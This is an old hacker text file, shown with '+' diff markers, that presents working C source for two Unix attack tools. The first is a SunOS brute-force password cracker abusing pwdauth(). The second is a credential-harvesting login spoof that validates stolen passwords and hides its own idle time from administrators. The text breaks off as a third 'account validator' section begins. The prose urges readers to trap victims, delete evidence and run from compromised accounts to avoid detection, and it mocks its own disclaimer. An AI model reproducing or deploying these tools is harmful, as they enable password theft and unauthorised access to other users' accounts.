+Disclaimer :
+
+The following text is for educational purposes only and I strongly suggest
+that it is not used for malicious purposes....yeah right!
+
+
+Introduction :
+
+Ok, I decided to release this phile to help out all you guys who wish to
+start hacking unix. Although these programs should compile & run
+on your system if you follow the instructions I have given, knowing a bit
+of C will come in handy if things go wrong. Other docs I suggest you read
+are older 'phrack' issues with shooting sharks various articles on unix,
+and of course, 'Unix from the ground up' by The Prophet.
+
+This article includes three programs, a SUNOS Brute force Shadow password
+file cracker, The Ultimate Login Spoof, and a Unix Account Validator.
+
+
+
+
+
+                               Shadow Crack
+                               ------------
+
+            SUNOS Unix brute force shadow password file cracker
+            ---------------------------------------------------
+
+Well, a while back, I saw an article in phrack which included a brute force
+password cracker for unix. This was a nice idea, except that these days
+more and more systems are moving towards the shadow password scheme. This,
+for those of you who are new to unix, involves storing the actual encrypted
+passwords in a different file, usually only accessible to root. A typical
+entry from a System V R4 password file looks like this :-
+
+root:x:0:1:Sys. admin:/:/bin/sh
+
+
+with the actual encrypted password replaced by an 'x' in the /etc/passwd
+file. The encrypted password is stored in a file(in the case of sysV)
+called /etc/shadow which has roughly the following format :-
+
+root:XyfgFekj95Fpq:::::
+
+
+this includes the login i.d., the encrypted password, and various other
+fields which hold info on password ageing etc...(no entry in the other
+fields indicate they are disabled).
+
+Now this was fine as long as we stayed away from system V's, but now a
+whole load of other companies have jumped on the bandwagon from IBM (aix)
+to Suns SUNOS systems. The system I will be dealing with is SUNOS's
+shadowed system. Now, like sysV, SUNOS also have a system whereby the
+actual encrypted passwords are stored in a file usually called
+/etc/security/passwd.adjunct, and normally this is accessible only by root.
+This rules out the use of brute force crackers, like the one in phrack
+quite a while back, and also modern day programs like CRACK. A typical
+/etc/passwd file entry on shadowed SUNOS systems looks like this :-
+
+root:##root:0:1:System Administrator:/:/bin/csh
+
+with the 'shadow' password file taking roughly the same format as that of
+Sys V, usually with some extra fields.
+
+However, we cannot use a program like CRACK, but SUNOS also supplied a
+function called pwdauth(), which basically takes two arguments, a login
+name and decrypted password, which is then encrypted and compared to the
+appropriate entry in the shadow file, thus if it matches, we have a valid
+i.d. & password, if not, we don't.
+
+I therefore decided to write a program which would exploit this function,
+and could be used to get valid i.d's and passwords even on a shadowed
+system!
+
+To my knowledge the use of the pwdauth() function is not logged, but I could
+be wrong. I have left it running for a while on the system I use and it has
+attracted no attention, and the administrator knows his shit. I have seen
+the functions getspwent() and getspwnam() in Sys V to manipulate the
+shadow password file, but not a function like pwdauth() that will actually
+validate the i.d. and password. If such a function does exist on other
+shadowed systems then this program could be very easily modified to work
+without problems.
+
+The only real beef I have about this program is that because the
+pwdauth() function uses the standard unix crypt() function to encrypt the
+supplied password, it is very slow!!! Even in burst mode, a password file
+with 1000's of users could take a while to get through. My advice is
+to run it in the background and direct all its screen output to /dev/null
+like so :-
+
+shcrack -mf -uroot -ddict1 > /dev/null &
+
+Then you can log out then come back and check on it later!
+
+The program works in a number of modes, all of which I will describe below,
+is command line driven, and can be used to crack both multiple accounts in
+the password file and single accounts specified. It is also NIS/NFS (Sun
+Yellow Pages) compatible.
+
+
+How to use it
+-------------
+
+shcrack  -m[mode]  -p[password file]  -u[user id]  -d[dictionary file]
+
+Usage :-
+
+-m[mode]  there are 3 modes of operation :-
+
+-mb  Burst mode, this scans the password file, trying the minimum number
+     of password guessing strategies on every account.
+
+-mi  Mini-burst mode, this also scans the password file, and tries most
+     password guessing strategies on every account.
+
+-mf  Brute-force mode, tries all password strategies, including the use
+     of words from a dictionary, on a single account specified.
+
+
+more about these modes in a sec, the other options are :-
+
+
+-p[password file]  This is the password file you wish to use, if this is
+                   left unspecified, the default is /etc/passwd.
+                   NB: The program automatically detects and uses the
+                   password file wherever it may be in NIS/NFS systems.
+
+
+-u[user id]  The login i.d. of the account you wish to crack, this is used
+             in Brute-force single user mode.
+
+
+-d[dict file]  This uses the words in a dictionary file to generate
+               possible passwords for use in single user brute force
+               mode. If no filename is specified, the program only uses the
+               password guessing strategies without using the dictionary.
+
+
+Modes
+^^^^^
+
+-mb  Burst mode basically gets each account from the appropriate password
+     file and uses two methods to guess its password. Firstly, it uses the
+     account name as a password, this name is then reversed and tried as a
+     possible password. This may seem like a weak strategy, but remember,
+     the users passwords are already shadowed, and therefore are deemed to
+     be secure. This can lead to sloppy passwords being used, and I have
+     came across many cases where the user has used his/her i.d. as a
+     password.
+
+
+-mi Mini-burst mode uses a number of other password generating methods
+    as well as the 2 listed in burst mode. One of the methods involves
+    taking the login i.d. of the account being cracked, and appending the
+    numbers 0 to 9 to the end of it to generate possible passwords. If
+    this mode has no luck, it then uses the accounts gecos 'comment'
+    information from the password file, splitting it into words and
+    trying these as passwords. Each word from the comment field is also
+    reversed and tried as a possible password.
+
+
+-mf Brute-force single user mode uses all the above techniques for password
+    guessing as well as using a dictionary file to provide possible
+    passwords to crack a single account specified. If no dictionary filename
+    is given, this mode operates on the single account using the
+    same methods as mini-burst mode, without the dictionary.
+
+
+Using shadow crack
+------------------
+
+To get program help from the command line just type :-
+
+$ shcrack <RETURN>
+
+which will show you all the modes of operation.
+
+If you wanted to crack just the account 'root', located in
+/etc/passwd(or elsewhere on NFS/NIS systems), using all methods
+including a dictionary file called 'dict1', you would do :-
+
+$ shcrack -mf -uroot -ddict1
+
+
+to do the above without using the dictionary file, do :-
+
+$ shcrack -mf -uroot
+
+
+or to do the above but in password file 'miner' do :-
+
+$ shcrack -mf -pminer -uroot
+
+
+to start cracking all accounts in /etc/passwd, using minimum password
+strategies do :-
+
+$ shcrack -mb
+
+
+to do the above but on a password file called 'miner' in your home
+directory do :-
+
+$ shcrack -mb -pminer
+
+
+to start cracking all accounts in 'miner', using all strategies except
+dictionary words do :-
+
+$ shcrack -mi -pminer
+
+
+ok, heres the code, ANSI C Compilers only :-
+
+---cut here-------------------------------------------------------------------
+
+/* Program   : Shadow Crack
+   Author    : (c)1994 The Shining/UPi (UK Division)
+   Date      : Released 12/4/94
+   Unix type : SUNOS Shadowed systems only */
+
+#include <stdio.h>
+#include <pwd.h>
+#include <string.h>
+#include <ctype.h>
+#include <signal.h>
+
+#define WORDSIZE 20     /* Maximum word size */
+#define OUTFILE "data"  /* File to store cracked account info */
+
+void word_strat( void ), do_dict( void );
+void add_nums( char * ), do_comment( char * );
+void try_word( char * ), reverse_word( char * );
+void find_mode( void ), burst_mode( void );
+void mini_burst( void ), brute_force( void );
+void user_info( void ), write_details( char * );
+void pwfile_name( void ), disable_interrupts( void ), cleanup();
+
+
+char *logname, *comment, *homedir, *shell, *dict, *mode,
+     *pwfile, *pwdauth();
+struct passwd *getpwnam(), *pwentry;
+extern char *optarg;
+int option, uid, gid;
+
+
+int main( int argc, char **argv )
+{
+disable_interrupts();
+system("clear");
+
+if (argc < 2) {
+printf("Shadow Crack - (c)1994 The Shining\n");
+printf("SUNOS Shadow password brute force cracker\n\n");
+printf("useage: %s -m[mode] -p[pwfile] -u[loginid] ", argv[0]);
+printf("-d[dictfile]\n\n\n");
+printf("[b] is burst mode, scans pwfile trying minimum\n");
+printf("    password strategies on all i.d's\n\n");
+printf("[i] is mini-burst mode, scans pwfile trying both\n");
+printf("    userid, gecos info, and numbers to all i.d's\n\n");
+printf("[f] is bruteforce mode, tries all above stategies\n");
+printf("    as well as dictionary words\n\n");
+printf("[pwfile]   Uses the password file [pwfile], default\n");
+printf("           is /etc/passwd\n\n");
+printf("[loginid]  Account you wish to crack, used with\n");
+printf("           -mf bruteforce mode only\n\n");
+printf("[dictfile] uses dictionary file [dictfile] to\n");
+printf("           generate passwords when used with\n");
+printf("           -mf bruteforce mode only\n\n");
+exit(0);
+}
+
+
+/* Get options from the command line and store them in different
+   variables */
+
+while ((option = getopt(argc, argv, "m:p:u:d:")) != EOF)
+ switch(option)
+ {
+   case 'm':
+           mode = optarg;
+           break;
+
+   case 'p':
+           pwfile = optarg;
+           break;
+
+   case 'u':
+           logname = optarg;
+           break;
+
+   case 'd':
+           dict = optarg;
+           break;
+
+   default:
+           printf("wrong options\n");
+           break;
+ }
+
+find_mode();
+}
+
+
+/* Routine to redirect interrupts */
+
+void disable_interrupts( void )
+{
+signal(SIGHUP, SIG_IGN);
+ signal(SIGTSTP, cleanup);
+  signal(SIGINT, cleanup);
+ signal(SIGQUIT, cleanup);
+signal(SIGTERM, cleanup);
+}
+
+
+/* If CTRL-Z or CTRL-C is pressed, clean up & quit */
+
+void cleanup( void )
+{
+FILE *fp;
+
+if ((fp = fopen("gecos", "r")) != NULL)
+   remove("gecos");
+
+if ((fp = fopen("data", "r")) == NULL)
+   printf("\nNo accounts cracked\n");
+
+printf("Quitting\n");
+exit(0);
+}
+
+
+/* Function to decide which mode is being used and call appropriate
+   routine */
+
+void find_mode( void )
+{
+ if (strcmp(mode, "b") == NULL)
+    burst_mode();
+ else
+ if (strcmp(mode, "i") == NULL)
+    mini_burst();
+ else
+ if (strcmp(mode, "f") == NULL)
+    brute_force();
+ else
+  {
+    printf("Sorry - No such mode\n");
+    exit(0);
+  }
+}
+
+
+/* Get a users information from the password file */
+
+void user_info( void )
+{
+  uid = pwentry->pw_uid;
+   gid = pwentry->pw_gid;
+    comment = pwentry->pw_gecos;
+   homedir = pwentry->pw_dir;
+  shell = pwentry->pw_shell;
+}
+
+
+
+/* Set the filename of the password file to be used, default is
+   /etc/passwd */
+
+void pwfile_name( void )
+{
+if (pwfile != NULL)
+    setpwfile(pwfile);
+}
+
+
+
+/* Burst mode, tries user i.d. & then reverses it as possible passwords
+   on every account found in the password file */
+
+void burst_mode( void )
+{
+pwfile_name();
+setpwent();
+
+  while ((pwentry = getpwent()) != (struct passwd *) NULL)
+  {
+     logname = pwentry->pw_name;
+      user_info();
+      try_word( logname );
+     reverse_word( logname );
+  }
+
+endpwent();
+}
+
+
+/* Mini-burst mode, try above combinations as well as other strategies
+   which include adding numbers to the end of the user i.d. to generate
+   passwords or using the comment field information in the password
+   file */
+
+void mini_burst( void )
+{
+pwfile_name();
+setpwent();
+
+  while ((pwentry = getpwent()) != (struct passwd *) NULL)
+  {
+     logname = pwentry->pw_name;
+      user_info();
+     word_strat();
+  }
+
+endpwent();
+}
+
+
+/* Brute force mode, uses all the above strategies as well using a
+   dictionary file to generate possible passwords */
+
+void brute_force( void )
+{
+pwfile_name();
+setpwent();
+
+  if ((pwentry = getpwnam(logname)) == (struct passwd *) NULL) {
+     printf("Sorry - User unknown\n");
+     exit(0);
+  }
+  else
+  {
+     user_info();
+      word_strat();
+     do_dict();
+  }
+
+endpwent();
+}
+
+
+/* Calls the various password guessing strategies */
+
+void word_strat()
+{
+ try_word( logname );
+  reverse_word( logname );
+   add_nums( logname );
+  do_comment( comment );
+}
+
+
+/* Takes the user name as its argument and then generates possible
+   passwords by adding the numbers 0-9 to the end. If the username
+   is greater than 7 characters, don't bother */
+
+void add_nums( char *wd )
+{
+int i;
+char temp[2], buff[WORDSIZE];
+
+if (strlen(wd) < 8) {
+
+  for (i = 0; i < 10; i++)
+  {
+      strcpy(buff, wd);
+       sprintf(temp, "%d", i);
+        strcat(wd, temp);
+       try_word( wd );
+      strcpy(wd, buff);
+  }
+
+ }
+}
+
+
+
+/* Gets info from the 'gecos' comment field in the password file,
+   then process this information generating possible passwords from it */
+
+void do_comment( char *wd )
+{
+FILE *fp;
+
+char temp[2], buff[WORDSIZE];
+int c,  flag;
+
+flag = 0;
+
+
+/* Open file & store users gecos information in it. w+ mode
+   allows us to write to it & then read from it. */
+
+if ((fp = fopen("gecos", "w+")) == NULL) {
+    printf("Error writing gecos info\n");
+   exit(0);
+}
+
+    fprintf(fp, "%s\n", wd);
+   rewind(fp);
+
+strcpy(buff, "");
+
+
+/* Process users gecos information, separate words by checking for the
+   ',' field separater or a space. */
+
+while ((c = fgetc(fp)) != EOF)
+{
+
+ if (( c != ',' ) && ( c != ' ' )) {
+     sprintf(temp, "%c", c);
+    strncat(buff, temp, 1);
+ }
+ else
+    flag = 1;
+
+
+   if ((isspace(c)) || (c == ',') != NULL) {
+
+     if (flag == 1) {
+        c=fgetc(fp);
+
+        if ((isspace(c)) || (iscntrl(c) == NULL))
+           ungetc(c, fp);
+     }
+
+     try_word(buff);
+      reverse_word(buff);
+       strcpy(buff, "");
+      flag = 0;
+     strcpy(temp, "");
+   }
+
+}
+fclose(fp);
+remove("gecos");
+}
+
+
+
+/* Takes a string of characters as its argument(in this case the login
+   i.d., and then reverses it */
+
+void reverse_word( char *wd )
+{
+char temp[2], buff[WORDSIZE];
+int i;
+
+i = strlen(wd) + 1;
+ strcpy(temp, "");
+strcpy(buff, "");
+
+ do
+ {
+    i--;
+    if ((isalnum(wd[i]) || (ispunct(wd[i]))) != NULL) {
+        sprintf(temp, "%c", wd[i]);
+       strncat(buff, temp, 1);
+    }
+
+ } while(i != 0);
+
+if (strlen(buff) > 1)
+   try_word(buff);
+}
+
+
+
+/* Read one word at a time from the specified dictionary for use
+   as possible passwords, if dictionary filename is NULL, ignore
+   this operation */
+
+void do_dict( void )
+{
+FILE *fp;
+char buff[WORDSIZE], temp[2];
+int c;
+
+strcpy(buff, "");
+strcpy(temp, "");
+
+
+if (dict == NULL)
+   exit(0);
+
+   if ((fp = fopen(dict, "r")) == NULL) {
+       printf("Error opening dictionary file\n");
+      exit(0);
+   }
+
+rewind(fp);
+
+
+ while ((c = fgetc(fp)) != EOF)
+ {
+  if ((c != ' ') || (c != '\n')) {
+     strcpy(temp, "");
+      sprintf(temp, "%c", c);
+     strncat(buff, temp, 1);
+  }
+
+  if (c == '\n') {
+    if (buff[0] != ' ')
+       try_word(buff);
+
+      strcpy(buff, "");
+  }
+ }
+
+fclose(fp);
+}
+
+
+/* Process the word to be used as a password by stripping \n from
+   it if necessary, then use the pwdauth() function, with the login
+   name and word to attempt to get a valid id & password */
+
+void try_word( char pw[] )
+{
+int pwstat, i, pwlength;
+char temp[2], buff[WORDSIZE];
+
+strcpy(buff, "");
+pwlength = strlen(pw);
+
+for (i = 0; i != pwlength; i++)
+{
+
+ if (pw[i] != '\n') {
+     strcpy(temp, "");
+     sprintf(temp, "%c", pw[i]);
+    strncat(buff, temp, 1);
+ }
+}
+
+ if (strlen(buff) > 3 ) {
+     printf("Trying : %s\n", buff);
+
+     if (pwstat = pwdauth(logname, buff) == NULL) {
+         printf("Valid Password! - writing details to 'data'\n");
+
+         write_details(buff);
+
+        if (strcmp(mode, "f") == NULL)
+           exit(0);
+     }
+ }
+}
+
+
+
+/* If valid account & password, store this, along with the accounts
+   uid, gid, comment, homedir & shell in a file called 'data' */
+
+void write_details( char *pw )
+{
+FILE *fp;
+
+if ((fp = fopen(OUTFILE, "a")) == NULL) {
+    printf("Error opening output file\n");
+   exit(0);
+}
+
+fprintf(fp, "%s:%s:%d:%d:", logname, pw, uid, gid);
+ fprintf(fp, "%s:%s:%s\n", comment, homedir, shell);
+fclose(fp);
+}
+
+---cut here-------------------------------------------------------------------
+
+again to compile it do :-
+
+$ gcc shcrack.c -o shcrack
+
+or
+
+$ acc shcrack.c -o shcrack
+
+this can vary depending on your compiler.
+
+
+
+
+                         The Ultimate Login Spoof
+                         ^^^^^^^^^^^^^^^^^^^^^^^^
+
+Well this subject has been covered many times before but its a while since
+I have seen a good one, and anyway I thought other unix spoofs have had two
+main problems :-
+
+1) They were pretty easy to detect when running
+2) They recorded any only shit entered.....
+
+
+Well now I feel these problems have been solved with the spoof below.
+Firstly, I want to say that no matter how many times spoofing is deemed as
+a 'lame' activity, I think it is very underestimated.
+
+
+When writing this I have considered every possible feature such a program
+should have. The main ones are :-
+
+
+1) To validate the entered login i.d. by searching for it in the
+   password file.
+
+2) Once validated, to get all information about the account entered
+   including - real name etc from the comment field, homedir info
+   (e.g. /homedir/miner) and the shell the account is using and
+   store all this in a file.
+
+3) To keep the spoofs tty idle time to 0, thus not to arouse the
+   administrators suspicions.
+
+4) To validates passwords before storing them, on all unshadowed unix systems
+   & SUNOS shadowed/unshadowed systems.
+
+5) To emulates the 'sync' dummy account, thus making it act like the
+   real login program.
+
+6) Disable all interrupts(CTRL-Z, CTRL-D, CTRL-C), and automatically
+   quit if it has not grabbed an account within a specified time.
+
+7) To automatically detect & display the hostname before the login prompt
+   e.g. 'ccu login:', this feature can be disabled if desired.
+
+8) To run continuously until a valid i.d. & valid password are entered.
+
+
+
+As well as the above features, I also added a few more to make the spoof
+'foolproof'. At university, a lot of the users have been 'stung' by
+login spoofs in the past, and so have become very conscious about security.
+
+For example, they now try and get around spoofs by entering any old crap when
+prompted for their login name, or to hit return a few times, to prevent any
+'crappy' spoofs which may be running. This is where my spoof shines!,
+firstly if someone was to enter -
+
+login: dhfhfhfhryr
+Password:
+
+
+into the spoof, it checks to see if the login i.d. entered is
+valid by searching for it in the password file. If it exists, the
+spoof then tries to validate the password. If both the i.d. & password
+are valid, these will be stored in a file called .data, along with
+additional information about the account taken directly from the password
+file.
+
+Now if, as in the case above, either the login name or password is
+incorrect, the information is discarded, and the login spoof runs again,
+waiting for a valid user i.d. & password to be entered.
+
+Also, a lot of systems these days have an unpassworded account called
+'sync', which when logged onto, usually displays the date & time the
+sync account was last logged into, and from which server or tty,
+the message of the day, syncs the disk, and then logs you straight out.
+
+A few people have decided that the best way to dodge login spoofs is to
+first login to this account then when they are automatically logged out,
+to login to their own account.
+
+They do this firstly, so that if a spoof is running it only records the
+details of the sync account and secondly the spoof would not act as the
+normal unix login program would, and therefore they would spot it and report
+it, thus landing you in the shit with the system administrator.
+
+However, I got around this problem so that when someone
+tries to login as sync (or another account of a similar type, which you can
+define), it acts exactly like the normal login program would, right down to
+displaying the system date & time as well as the message of the day!!
+
+
+                          The idle time facility
+                          ----------------------
+
+One of the main problems with unix spoofs, is they can be spotted
+so easily by the administrator, as he/she could get a list of current
+users on the system and see that an account was logged on, and had been
+idle for maybe 30 minutes. They would then investigate & the spoof
+would be discovered.
+
+I have therefore incorporated a scheme in the spoof whereby
+approx. every minute, the tty the spoof is executed from, is 'touched'
+with the current time, this effectively simulates terminal activity &
+keeps the terminals idle time to zero, which helps the spoofs chances
+of not being discovered greatly.
+
+The spoof also incorporates a routine which will automatically
+keep track of approximately how long the spoof has been running, and if
+it has been running for a specified time without grabbing an i.d. or password,
+will automatically exit and run the real login program.
+This timer is by default set to 12.5 minutes, but you can alter this time
+if you wish.
+
+Note: Due to the varying processing power of some systems, I could not
+      set the timer to exactly 60 seconds, I have therefore set it to 50,
+      incase it loses or gains extra time. Take this into consideration when
+      setting the spoofs timer to your own value. I recommend you
+      stick with the default, and under no circumstances let it run
+      for hours.
+
+
+
+                      Password Validation techniques
+                      ------------------------------
+
+The spoof basically uses 2 methods of password validation(or none at
+all on a shadowed system V). Firstly, when the spoof is used on any unix
+with an unshadowed password file, it uses the crypt function to validate a
+password entered. If however the system is running SUNOS 4.1.+ and
+incorporates the shadow password system, the program uses a function called
+pwdauth(). This takes the login i.d. & decrypted password as its arguments
+and checks to see if both are valid by encrypting the password and
+comparing it to the shadowed password file which is usually located in
+/etc/security and accessible only by root. By validating both the i.d. &
+password we ensure that the data which is saved to file is correct and not
+any old bullshit typed at the terminal!!!
+
+
+
+                            Executing the Spoof
+                            -------------------
+
+
+ok, now about the program. This is written in ANSI-C, so I hope you have a
+compatible compiler, GCC or suns ACC should do it. Now the only time you
+will need to change to the code is in the following circumstances :-
+
+1) If you are to compile & run it on an unshadowed unix,
+   in which case remove all references to the pwdauth() function,
+   from both the declarations & the shadow checking routine, add
+   this code in place of the shadow password checking routine :-
+
+        if ( shadow == 1 ) {
+             invalid = 0;
+          else
+             invalid = 1;
+       }
+
+2) Add the above code also to the spoof if you are running this on a system
+   V which is shadowed. In this case the spoof loses its ability to
+   validate the password, to my knowledge there is no sysV equivalent
+   of the pwdauth() function.
+
+Everything else should be pretty much compatible. You should have no
+problems compiling & running this on an unshadowed SUNOS machine, if
+you do, make the necessary changes as above, but it compiled ok
+on every unshadowed SUNOS I tested it on. The Spoof should
+automatically detect whether a SUNOS system is shadowed or unshadowed
+and run the appropriate code to deal with each situation.
+
+Note: when you have compiled this spoof, you MUST 'exec' it from the
+      current shell for it to work, you must also only have one shell
+      running. e.g. from C or Bourne shell using the GNU C Compiler do :-
+
+$ gcc spoof.c -o spoof
+$ exec spoof
+
+This replaces the current shell with the spoof, so when the spoof quits &
+runs the real login program, the hackers account is effectively logged off.
+
+ok enough of the bullshit, here's the spoof :-
+
+
+----------cut here-------------------------------------------------------
+
+/* Program   : Unix login spoof
+   Author    : The Shining/UPi (UK Division)
+   Date      : Released 12/4/94
+   Unix Type : All unshadowed unix systems &
+               shadowed SUNOS systems
+   Note      : This file MUST be exec'd from the shell. */
+
+
+#include <stdio.h>
+#include <string.h>
+#include <signal.h>
+#include <pwd.h>
+#include <time.h>
+#include <utime.h>
+
+#define OUTFILE ".data"           /* Data file to save account info into */
+#define LOGPATH "/usr/bin/login"  /* Path of real login program */
+#define DUMMYID "sync"            /* Dummy account on your system */
+#define DLENGTH 4                 /* Length of dummy account name */
+
+
+FILE *fp;
+
+
+/* Set up variables to store system time & date */
+
+time_t now;
+
+static int time_out, time_on, no_message, loop_cnt;
+
+
+/* Set up a structure to store users information */
+
+struct loginfo {
+              char logname[10];
+              char key[9];
+              char *comment;
+              char *homedir;
+              char *shell;
+            } u;
+
+
+/* Use the unix function getpass() to read user password and
+   crypt() or pwdauth()  (remove it below if not SUNOS)
+   to validate it etc */
+
+char *getpass(), *gethostname(), *alarm(), *sleep(),
+     *crypt(), *ttyname(), *pwdauth(), motd, log_date[60],
+     pass[14], salt[3], *tty, cons[] = " on console ",
+     hname[72], *ld;
+
+
+/* flag = exit status, ppid = pid shell, wait = pause length,
+   pwstat = holds 0 if valid password, shadow holds 1 if shadow
+   password system is being used, 0 otherwise. */
+
+int flag, ppid, wait, pwstat, shadow, invalid;
+
+
+/* Declare main functions */
+
+     void write_details(struct loginfo *);
+     void catch( void ), disable_interrupts( void );
+     void log_out( void ), get_info( void ),
+          invalid_login( void ), prep_str( char * );
+
+
+/* set up pointer to point to pwfile structure, and also
+   a pointer to the utime() structure */
+
+
+struct passwd *pwentry, *getpwnam();
+struct utimbuf *times;
+
+
+int main( void )
+{
+system("clear");
+
+/* Initialise main program variables to 0, change 'loop_cnt' to 1
+   if you do not want the machines host name to appear with
+   the login prompt! (e.g. prompt is `login:` instead of
+   'MIT login:'  etc) */
+
+     wait = 3;               /* Holds value for pause */
+      flag = 0;              /* Spoof ends if value is 1 */
+       loop_cnt = 0;         /* Change this to 1 if no host required */
+       time_out = 0;         /* Stops timer if spoof has been used */
+      time_on = 0;           /* Holds minutes spoof has been running */
+     disable_interrupts();   /* Call function to disable Interrupts */
+
+
+/* Get system time & date and store in log_date, this is
+   displayed when someone logs in as 'sync' */
+
+ now = time(NULL);
+  strftime(log_date, 60, "Last Login: %a %h %d %H:%M:%S", localtime(&now));
+  strcat(log_date, cons);
+ ld = log_date;
+
+
+/* Get Hostname and tty name */
+
+gethostname(hname, 64);
+ strcat(hname, " login: ");
+tty = ttyname();
+
+
+/* main routine */
+
+  while( flag == 0 )
+  {
+       invalid = 0;        /* Holds 1 if id +/or pw are invalid */
+        shadow = 0;        /* 1 if shadow scheme is in operation */
+         no_message = 0;   /* Flag for Login Incorrect msg */
+        alarm(50);         /* set timer going */
+       get_info();         /* get user i.d. & password */
+
+
+/* Check to see if the user i.d. entered is 'sync', if it is
+   display system time & date, display message of the day and
+   then run the spoof again, insert the account of your
+   choice here, if its not sync, but remember to put
+   the length of the accounts name next to it! */
+
+     if (strncmp(u.logname, DUMMYID, DLENGTH) == NULL) {
+        printf("%s\n", ld);
+
+          if ((fp = fopen("/etc/motd", "r")) != NULL) {
+              while ((motd = getc(fp)) != EOF)
+                     putchar(motd);
+
+              fclose(fp);
+          }
+
+           printf("\n");
+             prep_str(u.logname);
+             no_message = 1;
+           sleep(wait);
+     }
+
+
+/* Check if a valid user i.d. has been input, then check to see if
+   the password system is shadowed or unshadowed.
+   If both the user i.d. & password are valid, get additional info
+   from the password file, and store all info in a file called .data,
+   then exit spoof and run real login program */
+
+    setpwent();   /* Rewind pwfile to beign processing */
+
+
+    if ((pwentry = getpwnam(u.logname)) == (struct passwd *) NULL) {
+         invalid = 1;
+        flag = 0;
+    }
+    else
+       strncpy(salt, pwentry->pw_passwd, 2);
+
+
+/* Check for shadowed password system, in SUNOS, the field in /etc/passwd
+   should begin with '##', in system V it could contain an 'x', if none
+   of these exist, it checks that the entry = 13 chars, if less then
+   shadow system will probably be implemented (unless acct has been
+   disabled) */
+
+ if ( invalid == 0 ) {
+
+       if ((strcmp(salt, "##")) || (strncmp(salt, "x", 1)) == NULL)
+           shadow = 1;
+       else
+          if (strlen(pwentry->pw_passwd) < 13)
+             shadow = 1;
+
+
+/* If unshadowed, use the salt from the pwfile field & the key to
+   form the encrypted password which is checked against the entry
+   in the password file, if it matches, then all is well, if not,
+   spoof runs again!! */
+
+    if ( shadow != 1 ) {
+
+      if (strcmp(pwentry->pw_passwd, crypt(u.key, salt)) == NULL)
+         invalid = 0;
+      else
+         invalid = 1;
+    }
+
+
+/* If SUNOS Shadowing is in operation, use the pwdauth() function
+   to validate the password, if not SUNOS, substitute this code
+   with the routine I gave earlier! */
+
+       if ( shadow == 1 ) {
+          if (pwstat = pwdauth(u.logname, u.key) == NULL)
+             invalid = 0;
+          else
+             invalid = 1;
+       }
+}
+
+
+/* If we have a valid account & password, get user info from the
+   pwfile & store it */
+
+        if ( invalid == 0 ) {
+
+           u.comment = pwentry->pw_gecos;
+            u.homedir = pwentry->pw_dir;
+           u.shell = pwentry->pw_shell;
+
+          /* Open file to store user info */
+
+           if ((fp = fopen(OUTFILE, "a")) == NULL)
+              log_out();
+
+               write_details(&u);
+                fclose(fp);
+                no_message = 1;
+               flag = 1;
+        }
+        else
+           flag = 0;
+
+        invalid_login();
+
+    endpwent();                       /* Close pwfile */
+
+    if (no_message == 0)
+       loop_cnt++;
+
+  }                                  /* end while */
+
+log_out();                           /* call real login program */
+
+}
+
+
+/* Function to read user i.d. & password */
+
+void get_info( void )
+{
+   char user[11];
+   unsigned int string_len;
+
+   fflush(stdin);
+    prep_str(u.logname);
+    prep_str(u.key);
+   strcpy(user, "\n");
+
+
+/* Loop while some loser keeps hitting return when asked for user
+   i.d. and if someone hits CTRL-D to break out of spoof. Enter
+   a # at login to exit spoof. Uncomment the appropriate line(s)
+   below to customise the spoof to look like your system */
+
+  while ((strcmp(user, "\n") == NULL) && (!feof(stdin)))
+  {
+   /* printf("Scorch Ltd SUNOS 4.1.3\n\n); */
+
+    if (loop_cnt > 0)
+       strcpy(hname, "login: ");
+
+      printf("%s", hname);
+      fgets(user, 9, stdin);
+
+
+   /* Back door for hacker, # at present, can be changed,
+      but leave \n in. */
+
+     if (strcmp(user, "#\n") == NULL)
+         exit(0);
+
+
+    /* Strip \n from login i.d. */
+
+     if (strlen(user) < 8)
+        string_len = strlen(user) - 1;
+     else
+        string_len = strlen(user);
+
+     strncpy(u.logname, user, string_len);
+
+
+
+/* check to see if CTRL-D has occurred because it does not
+   generate an interrupt like CTRL-C, but instead generates
+   an end-of-file on stdin */
+
+     if (feof(stdin)) {
+         clearerr(stdin);
+        printf("\n");
+     }
+
+  }
+
+
+
+/* Turn off screen display & read users password */
+
+     strncpy(u.key, getpass("Password:"), 8);
+
+}
+
+
+
+/* Function to increment the timer which holds the amount of time
+   the spoof has been running */
+
+void catch( void )
+{
+  time_on++;
+
+
+/* If spoof has been running for 15 minutes, and has not
+   been used, stop timer and call spoof exit routine */
+
+if ( time_out == 0 ) {
+   if (time_on == 15) {
+       printf("\n");
+        alarm(0);
+       log_out();
+   }
+}
+
+
+/* 'Touch' your tty, effectively keeping terminal idle time to 0 */
+
+ utime(tty, times);
+alarm(50);
+}
+
+
+
+/* Initialise a string with \0's */
+
+void prep_str( char str[] )
+{
+int strl, cnt;
+
+strl = strlen(str);
+for (cnt = 0; cnt != strl; cnt++)
+    str[cnt] = ' ';
+}
+
+
+/* function to catch interrupts, CTRL-C & CTRL-Z etc as
+   well as the timer signals */
+
+void disable_interrupts( void )
+{
+   signal(SIGALRM, catch);
+    signal(SIGQUIT, SIG_IGN);
+     signal(SIGTERM, SIG_IGN);
+    signal(SIGINT, SIG_IGN);
+   signal(SIGTSTP, SIG_IGN);
+}
+
+
+/* Write the users i.d., password, personal information, homedir
+   and shell to a file */
+
+void write_details(struct loginfo *sptr)
+{
+
+   fprintf(fp, "%s:%s:", sptr->logname, sptr->key);
+    fprintf(fp, "%d:%d:", pwentry->pw_uid, pwentry->pw_gid);
+     fprintf(fp, "%s:%s:", sptr->comment, sptr->homedir);
+    fprintf(fp, "%s\n", sptr->shell);
+   fprintf(fp, "\n");
+}
+
+
+
+/* Display login incorrect only if the user hasn't logged on as
+   'sync' */
+
+void invalid_login( void )
+{
+
+         if ( flag == 1 && pwstat == 0 )
+            sleep(wait);
+
+         if ( no_message == 0 )
+            printf("Login incorrect\n");
+}
+
+
+/* Displays appropriate message, exec's the real login program,
+   this replaces the spoof & effectively logs spoof's account off.
+   Note: this spoof must be exec'd from the shell to work */
+
+void log_out( void )
+{
+  time_out = 1;
+
+   if ( no_message == 1 ) {
+        sleep(1);
+       printf("Login incorrect\n");
+   }
+
+   execl(LOGPATH, "login", (char *)0);
+}
+
+----------cut here-------------------------------------------------------
+
+then delete the source, run it and wait for some sucker to login!.
+If you do initially run this spoof from your account, I suggest you
+remove it when you have grabbed someone's account and run it from theirs
+from then on, this reduces your chances of being caught!
+
+
+
+
+
+                      User i.d. & Password Validator
+                      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+Now if you are familiar with the unix Crack program, as I'm sure most of
+you are ;-), or if you have used my spoof to grab some accounts,
+this little program could be of some use. Say you have snagged
